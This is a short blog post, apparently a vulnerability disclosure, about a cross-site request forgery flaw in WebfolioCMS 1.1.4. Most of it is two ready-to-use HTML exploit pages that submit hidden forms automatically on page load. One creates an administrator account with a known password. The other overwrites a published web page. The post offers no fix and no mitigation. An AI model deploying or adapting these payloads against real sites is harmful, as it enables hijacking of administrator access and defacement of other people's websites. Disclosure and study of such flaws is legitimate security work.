Breaking News
Loading...
Sunday, March 9, 2014

WebfolioCMS 1.1.4 CSRF

5:47 AM
1)Introduction
Webfolio CMS "is a free, open-source, customized content management system, whose main purpose is creation of web sites for
presenting someone's work, and portfolio-like websites".
2)Vulnerabilities Description
WebfolioCMS 1.1.4 (and lower) is affected by a CSRF Vulnerability which allows an attacker to add a new administrator, modify a
web pages, and change may any other WebfolioCMS's parameter. In this document I will demonstrate how to add an
administrator account and how to modify an existing and published web pages. other parameters can be modified with little changes.

3)Exploit
 3.1 Add Administrator
 <html>
 <body onload="javascript:document.forms[0].submit()">
 <H2>CSRF Exploit to add ADMIN account</H2>
 <form method="POST" name="form0" action="http://<webfolio_ip>:80/admin/users/add ">
 <input type="hidden" name="user[username]" value="new_admin"/>
 <input type="hidden" name="user[email]" value="admin@admin.com"/>
 <input type="hidden" name="user_meta[firstName]" value="admin_firstname"/>
 <input type="hidden" name="user_meta[lastName]" value="admin_lastname"/>
 <input type="hidden" name="user[password]" value="password"/>
 <input type="hidden" name="re_password" value="password"/>
 <input type="hidden" name="user[groupId]" value="1"/>
 <input type="hidden" name="add" value="Add"/>
 </form>
 </body>
 </html>
  3.2 Modify Web Page
  <html>
  <body onload="javascript:document.forms[0].submit()">
  <H2>CSRF Exploit to Modify published web page</H2>
  <form method="POST" name="form0" action="http://<webfolio_ip>:80/admin/pages/edit/web_page_name">
  <input type="hidden" name="title" value="new_title"/>
  <input type="hidden" name="text" value="new_text"/>
  <input type="hidden" name="id" value="1"/>
  <input type="hidden" name="titleUrlFormat" value="test"/>
  <input type="hidden" name="save" value="Save"/>
  </form>
  </body>
  </html>

0 comments:

Post a Comment

 
Toggle Footer